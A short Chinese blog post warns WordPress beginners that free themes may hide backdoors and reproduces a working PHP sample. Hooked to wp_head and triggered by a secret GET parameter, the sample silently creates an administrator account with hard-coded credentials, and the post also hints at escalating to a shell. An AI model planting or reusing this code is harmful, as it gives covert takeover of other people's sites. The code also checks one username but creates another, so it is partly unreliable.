關於 WordPress 主題的後門程式碼
4,980 0
有一些剛剛接觸 WordPress 的新手們,總是喜歡到網路上去找一些免費主題,卻不知道這些主題很有可能藏有後門,可以輕鬆地取得你網站的權限,從而獲取非法利益。
所以我在這裡要提醒一下那些新手們,找主題一定要找正版的。如果是免費版,最好是有 GitHub 開源專案的主題,這樣在一定程度上都會減少遇到後門的機率。
範例
下面給大家帶來一個常見的後門程式碼:
PHP PHP
add_action('wp_head', 'my_backdoor');
function my_backdoor() {
if (md5($_GET['backdoor']) == 'b0f455571f6ae6c30e7521e9bf00b4f2') {
require('wp-includes/registration.php');
if (!username_exists('mr_admin')) {
$user_id = wp_create_user('xinyewl', 'me');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
只要 PHP 觸發了這段程式碼,進行了請求,你就可以使用你的密碼來登入他的後台了,正常登入即可取得管理員權限。也就是說,你甚至可以拿到 shell,具體不多說,自己領悟。
我這裡預設設定的帳號密碼是:
帳號:xinyewl
密碼:me
具體怎麼使用,我不會說的,也是為了避免小學生惡意植入主題。
好了就這樣了,千萬別拿來做壞事。

評論
(0)暫無評論,來說兩句吧